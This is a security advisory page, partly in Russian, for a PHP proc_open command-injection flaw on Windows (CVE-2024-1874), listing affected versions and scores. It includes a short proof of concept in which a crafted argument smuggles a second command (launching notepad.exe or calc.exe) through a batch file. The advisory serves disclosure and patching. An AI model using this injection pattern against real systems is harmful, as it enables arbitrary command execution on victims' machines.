GHSA-pc52-254m-w9w7

Опубликовано: 11 апр. 2024

Источник: github

Github: Не прошло ревью

CVSS3: 9.4

Описание

Command injection via array-ish $command parameter of proc_open even if bypass_shell option enabled on Windows

Summary

NOTE: There are undergoing reports regarding the command injection when executing the batch file, and several programming languages are coordinating the disclosure date. If you decide to not consider this as a vulnerability, please do not disclose this behavior until the end of February. If the coordinated disclosure is needed, please let me know.

Due to the improper handling of command line arguments on Windows, maliciously crafted arguments can inject arbitrary commands even if the bypass_shell option is enabled.

Details

proc_open executes external commands passed via its arguments. The documentation of this function states the following:

As of PHP 7.4.0, the command may be passed as an array of command parameters. In this case, the process will be opened directly (without going through a shell) and PHP will take care of any necessary argument escaping.

bypass_shell (windows only): bypass cmd.exe shell when set to true

However, when executing .bat or .cmd files, CreateProcess implicitly spawns cmd.exe, resulting in command line arguments being parsed in cmd.exe despite the documentation explicitly stating it doesn't spawn the shell. While proc_open tries to escape the arguments, command prompts will not recognize \ as the escape character. So, the following command line argument will spawn calc.exe:

test.bat "\"&calc.exe"

PoC

Save the following file as test.bat.

echo hello

Save the following file as test.php

<?php $descriptorspec = [STDIN, STDOUT, STDOUT]; $proc = proc_open(["test.bat", "\"&notepad.exe"], $descriptorspec, $pipes); proc_close($proc);

Run it with PHP and confirm that notepad.exe is executed.

Alternatively, you can use the following PHP file to confirm that the bypass_shell option doesn't prevent this behavior.

<?php $descriptorspec = [STDIN, STDOUT, STDOUT]; $proc = proc_open(["test.bat", "\"&notepad.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true)); proc_close($proc);

Impact

This vulnerability allows malicious command line arguments to execute arbitrary commands if it's passed to .bat or .cmd through proc_open. Since command line arguments are not expected to be parsed via the shell, it allows unexpected code execution.

Пакеты

Наименование

Отсутствует

Затронутые версииВерсия исправления

< 8.1.28

8.1.28

Наименование

Отсутствует

Затронутые версииВерсия исправления

< 8.2.18

8.2.18

Наименование

Отсутствует

Затронутые версииВерсия исправления

< 8.3.5

8.3.6

EPSS

Процентиль: 97%

0.43938

Средний

9.4 Critical

CVSS3

CVE ID

CVE-2024-1874

Связанные уязвимости

CVE-2024-1874

CVSS3: 9.4

ubuntu

около 1 года назад

In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.